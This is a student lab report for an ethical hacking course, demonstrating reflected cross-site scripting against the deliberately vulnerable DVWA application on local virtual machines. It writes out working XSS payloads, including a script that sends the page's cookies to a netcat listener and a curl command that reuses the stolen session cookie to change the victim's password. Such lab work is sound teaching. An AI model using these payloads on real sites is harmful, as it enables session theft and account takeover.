AEH LAB 2: Cross Site Scripting

Team Cobra

COMP4077 Advanced Ethical Hacking

Woody Yao / 101493514

Deepika Verankki / 100548781
Hadi Ul Hamd / 101516394
Abraham Varghese / 101503022
Bilal Wardak / 101505588
Pre-setups
Before we start the lab, the Kali VM and Metasploitable2 VM need to be prepared first.

On VMware workstation when we open Kali Linux and Metasploitable 2 Linux OS and check
with command ifconfig we can see IP addresses with subnet mask for both. We notice the
IP address for Kali Linux is 192.168.170.133 and the subnet mask is 255.255.255.0. The
IP address for Metasploitable2 Linux is 192.168.170.134 and the subnet mask is
255.255.255.0. Both VMs can ping each other successfully. We can also ping public
domains without any problems.
To conduct this lab practice, we also need to have DVWA installed in the Kali machine. Here
we can use either command apt install dvwa or replicate the GitHub directory with git
clone then run the installation script to accomplish the task.
Use apt install dvwa:
Use the installation script:

After we complete the installation, we can access the Metasploitable2 machine or localhost
via DVWA with the default credential.
The first time visiting localhost via DVWA will get users to the setup page. After clicking the
button to create database, the DVWA will be all set.
The Damn Vulnerable Web Application (DVWA) is a is a PHP/MySQL web application. It is a
free open source designed for security professionals to test their skills and understand web
application security processes. It provides a platform to experiment with new penetration
testing tools and practice new exploitation techniques to exploit common vulnerabilities.
The final step of pre-setup is going to DVWA Security page and turn the script security level
down to low so we can run the Cross Site Script otherwise the security may block the script
when we run on the browser.
 1. Demonstrate Reflected XSS as mentioned in the lecture.
Test all the commands/scripts showed by your instructor in
the slides in DVWA.

To execute reflected XSS, we need to navigate to the webpage by clicking tag “XSS
(Reflected)” first.

Once we are able to execute the XSS, not only the textbox would show what we type but
also the URL would show what the name setting is.
Furthermore, since it is a web application, we can also execute the command with html
functionalities. Other than heading1 <H1> and italic <i> which are showed in the class
lecture, here we also try bold <b> and heading3 <H3>:
Next, we would like to try putting scripts and running them.
The alert function would pop up a window showing assigned texts.
After putting <script>document.location = "http://yahoo.com"</script> into the
input field of the "XSS (Reflected)" section in DVWA and executing it, the script would
automatically redirect the webpage to designated website which is http://yahoo.com in
this case. This demonstrates a reflected XSS vulnerability, where malicious scripts can be
injected and executed to redirect users to other websites that contain malwares or other
malicious contents.
Here we continue the practice with the script <iframe
src="http://google.com"></iframe>. An inline frame (iframe) is a HTML element that
loads another HTML page within the document. It essentially puts another webpage within
the parent page. They are commonly used for advertisements, embedded videos, web
analytics and interactive content. However, the web browser shows it does not allow
embedded websites by it security protocols. We can still embed other things such as
YouTube video via XSS, with script <iframe
src="https://www.youtube.com/embed/WkyDxNJkgQ4?si=o2TCvHKiRCNPNSII"
title="YouTube video player" ></iframe>:

With <script>alert(document.cookie)</script>, we are able to extract the cookies of

the host, but it will also set a security flag for the user. To avoid that we may turn on netcat
and become a listener, then put <script>new Image
().src="http://localhost:9999/"+document.cookie;</script> to execution on DVWA:
This HTML script creates an image object and sets its source to a URL formed by
concatenating "http://localhost:9999/" with the value of the document.cookie property. The
document.cookie property contains information about cookies stored in the user’s browser.
By loading this URL, the script attempts to send the user’s cookies to the specified server.
With the intercepted cookie, we can now change the user password remotely:

After we execute the command curl -b

"security=low;PHPSESSID=p7d1d1f623crcnk4dom3pa9di6" --location
"http://localhost/DVWA/vulnerabilities/csrf/?
password_new=helloworld&password_conf
=helloworld&Change=Change#", the password would be changed to “helloworld”
instead of “password”.
We may also encode the URL with base64 to pass the security check.

2. Demonstrate Stored XSS as mentioned in the lecture. Test

all the commands/scripts showed by your instructor in the
slides in DVWA.

3. Demonstrate Reflected XSS as mentioned in the lecture

but this time use Mutillidae Portal. Test all the
commands/scripts showed by your instructor in the slides.